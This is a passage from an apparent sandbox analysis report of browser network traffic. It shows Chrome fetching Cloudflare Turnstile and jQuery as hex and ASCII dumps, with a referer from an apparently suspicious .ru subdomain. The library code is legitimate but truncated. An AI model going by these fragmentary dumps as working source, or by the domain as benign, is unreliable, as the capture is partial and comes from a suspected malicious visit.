                                                                2025-01-13 19:54:49 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2025-01-13 19:54:49 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549717104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:49 UTC561OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://rfll.yordickyel.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:49 UTC471INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:49 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 47521
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0bcbe6a18bc-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:49 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                2025-01-13 19:54:49 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549718151.101.66.1374433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:49 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:50 UTC613INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Date: Mon, 13 Jan 2025 19:54:49 GMT
                                                                Age: 2282616
                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740074-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 2774, 3
                                                                X-Timer: S1736798090.965404,VS0,VE0
                                                                Vary: Accept-Encoding
                                                                2025-01-13 19:54:50 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2025-01-13 19:54:50 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                2025-01-13 19:54:50 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                2025-01-13 19:54:50 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                2025-01-13 19:54:50 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
